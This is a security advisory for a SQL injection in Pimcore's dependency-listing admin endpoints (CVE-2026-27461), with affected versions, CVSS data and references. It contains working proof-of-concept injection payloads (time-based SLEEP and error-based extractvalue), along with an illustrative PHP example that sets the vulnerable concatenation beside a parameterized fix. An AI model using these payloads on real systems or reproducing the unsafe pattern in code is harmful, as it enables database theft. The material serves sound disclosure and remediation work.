GHSA-VXG3-V4P6-F3FP
Vulnerability from github – Published: 2026-02-24 20:03 – Updated: 2026-02-24 20:03

The filter query parameter in the dependency listing endpoints is JSON-decoded and the value field is concatenated directly into RLIKE clauses without sanitization or parameterized queries.

Affected code in models/Dependency/Dao.php:
- getFilterRequiresByPath() lines 90, 95, 100
- getFilterRequiredByPath() lines 148, 153, 158
All 6 locations use direct string concatenation like:
"AND LOWER(CONCAT(o.path, o.key)) RLIKE '".$value."'"
Note that $orderBy and $orderDirection in the same methods (lines 75-81) ARE properly whitelist-validated, but $value has zero sanitization.
Entry points (pimcore/admin-ui-classic-bundle ElementController.php):
- GET /admin/element/get-requires-dependencies (line 654)
- GET /admin/element/get-required-by-dependencies (line 714)
The controller JSON-decodes the filter query param and passes $filter['value'] straight to the Dao without any escaping.
PoC (time-based blind):
GET /admin/element/get-requires-dependencies?id=1&elementType=document&filter=[{"type":"string","value":"x' OR SLEEP(5)#"}]
If vulnerable, the response is delayed by ~15 seconds (SLEEP runs 3 times, once per UNION arm in the inner subquery).
PoC (error-based extraction):
GET /admin/element/get-requires-dependencies?id=1&elementType=document&filter=[{"type":"string","value":"x' OR extractvalue(1,concat(0x7e,(SELECT version())))#"}]
Returns the MySQL version string in the error response.
Requires admin authentication. An attacker with admin panel access can extract the full database including password hashes of other admin users.
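As an added illustration of the concatenation pattern described above (example code written for this page, not Pimcore's Dao and not the referenced fix commit), the vulnerable RLIKE clause sits beside a version that binds the filter value as a parameter, plus a controller-side type check. The objects table, its rows, and the function names are hypothetical; an in-memory SQLite database with a user-defined REGEXP function stands in for MySQL's RLIKE so the script runs without a database server.

```php
<?php
// Added example (not Pimcore's code and not the referenced fix): the RLIKE
// concatenation pattern from the advisory, beside a version that binds the
// filter value as a parameter. Table/column names, the sample rows and the
// extractFilterValue() helper are hypothetical. An in-memory SQLite database
// with a user-defined REGEXP function stands in for MySQL's RLIKE so the
// script runs stand-alone.
declare(strict_types=1);

function openDb(): PDO
{
    $pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
    // SQLite evaluates "x REGEXP y" by calling the user function regexp(y, x).
    // (PDO::sqliteCreateFunction is deprecated in PHP 8.4 in favour of
    // Pdo\Sqlite::createFunction, but it still works.)
    $pdo->sqliteCreateFunction('regexp', static function (string $pattern, ?string $subject): int {
        if ($subject === null) {
            return 0;
        }
        $delimited = '/' . str_replace('/', '\/', $pattern) . '/i';
        return @preg_match($delimited, $subject) === 1 ? 1 : 0;
    }, 2);
    $pdo->exec('CREATE TABLE objects (id INTEGER PRIMARY KEY, path TEXT NOT NULL, "key" TEXT NOT NULL)');
    // Constructed sample rows.
    $pdo->exec("INSERT INTO objects (path, \"key\") VALUES ('/products/', 'shoe'), ('/products/', 'hat'), ('/internal/', 'config')");
    return $pdo;
}

/** Vulnerable: the value is spliced into the SQL text, as the advisory describes. */
function filterByPathUnsafe(PDO $pdo, string $value): array
{
    $sql = "SELECT o.id FROM objects o WHERE 1=1"
        . " AND LOWER(o.path || o.\"key\") REGEXP '" . $value . "'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

/** Hardened: the value is a bound parameter and never becomes part of the SQL text. */
function filterByPathSafe(PDO $pdo, string $value): array
{
    // Binding removes the injection, but the value is still a regular expression
    // evaluated by the database server, so limit its size as well.
    if ($value === '' || strlen($value) > 200) {
        throw new InvalidArgumentException('filter value out of bounds');
    }
    $stmt = $pdo->prepare('SELECT o.id FROM objects o WHERE LOWER(o.path || o."key") REGEXP :value');
    $stmt->execute([':value' => strtolower($value)]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

/** Controller-side guard (hypothetical): json_decode() can yield any shape, so insist on a string value. */
function extractFilterValue(string $filterParam): ?string
{
    $decoded = json_decode($filterParam, true);
    if (!is_array($decoded)) {
        return null;
    }
    foreach ($decoded as $filter) {
        if (is_array($filter) && ($filter['type'] ?? null) === 'string' && is_string($filter['value'] ?? null)) {
            return $filter['value'];
        }
    }
    return null;
}

$pdo = openDb();
$benign = 'products';
$quoted = "it's";   // a stray single quote is enough to break out of the literal

printf("safe   %-10s -> %s\n", $benign, json_encode(filterByPathSafe($pdo, $benign)));   // [1,2]
printf("safe   %-10s -> %s\n", $quoted, json_encode(filterByPathSafe($pdo, $quoted)));   // []
try {
    filterByPathUnsafe($pdo, $quoted);
} catch (PDOException $e) {
    // The quote terminated the string literal and the remainder was parsed as SQL:
    // a syntax error with this value, and the bug the advisory describes in general.
    echo "unsafe {$quoted} -> SQL error: " . $e->getMessage() . "\n";
}
// Constructed filter parameter in the shape the endpoints accept.
$value = extractFilterValue('[{"type":"string","value":"products"}]');
printf("controller guard -> %s\n", var_export($value, true));
```

Run it with `php example.php`. The point of the contrast is that the bound parameter keeps the quote inert: the same value that raises a syntax error in the concatenated query is simply an unmatched pattern in the prepared one. Because RLIKE still hands the user a regex engine on the server, a length cap (or switching to a LIKE/substring match where regex semantics are not needed) belongs alongside the parameterization, and the type check at the controller keeps non-string JSON values from ever reaching the Dao.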
{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "pimcore/pimcore"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "11.5.14.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "pimcore/pimcore"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "12.0.0"
            },
            {
              "fixed": "12.3.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27461"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-24T20:03:23Z",
    "nvd_published_at": "2026-02-24T04:15:58Z",
    "severity": "MODERATE"
  },
  "details": "The filter query parameter in the dependency listing endpoints is JSON-decoded and the value field is concatenated directly into RLIKE clauses without sanitization or parameterized queries.\n\nAffected code in models/Dependency/Dao.php:\n- getFilterRequiresByPath() lines 90, 95, 100\n- getFilterRequiredByPath() lines 148, 153, 158\n\nAll 6 locations use direct string concatenation like:\n\n \"AND LOWER(CONCAT(o.path, o.key)) RLIKE \u0027\".$value.\"\u0027\"\n\nNote that $orderBy and $orderDirection in the same methods (lines 75-81) ARE properly whitelist-validated, but $value has zero sanitization.\n\nEntry points (pimcore/admin-ui-classic-bundle ElementController.php):\n- GET /admin/element/get-requires-dependencies (line 654)\n- GET /admin/element/get-required-by-dependencies (line 714)\n\nThe controller JSON-decodes the filter query param and passes $filter[\u0027value\u0027] straight to the Dao without any escaping.\n\nPoC (time-based blind):\n\n GET /admin/element/get-requires-dependencies?id=1\u0026elementType=document\u0026filter=[{\"type\":\"string\",\"value\":\"x\u0027 OR SLEEP(5)#\"}]\n\nIf vulnerable, the response is delayed by ~15 seconds (SLEEP runs 3 times, once per UNION arm in the inner subquery).\n\nPoC (error-based extraction):\n\n GET /admin/element/get-requires-dependencies?id=1\u0026elementType=document\u0026filter=[{\"type\":\"string\",\"value\":\"x\u0027 OR extractvalue(1,concat(0x7e,(SELECT version())))#\"}]\n\nReturns the MySQL version string in the error response.\n\nRequires admin authentication. An attacker with admin panel access can extract the full database including password hashes of other admin users.",
  "id": "GHSA-vxg3-v4p6-f3fp",
  "modified": "2026-02-24T20:03:23Z",
  "published": "2026-02-24T20:03:23Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pimcore/pimcore/security/advisories/GHSA-vxg3-v4p6-f3fp"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27461"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pimcore/pimcore/pull/18991"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pimcore/pimcore/commit/1c3925fbec4895abeb21e5c244a83679c4e4a6f4"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pimcore/pimcore"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pimcore/pimcore/releases/tag/v12.3.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Pimcore vulnerable to SQL injection via unsanitized filter value in Dependency Dao RLIKE clause"
}
Sightings
| Author | Source | Type | Date |
|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.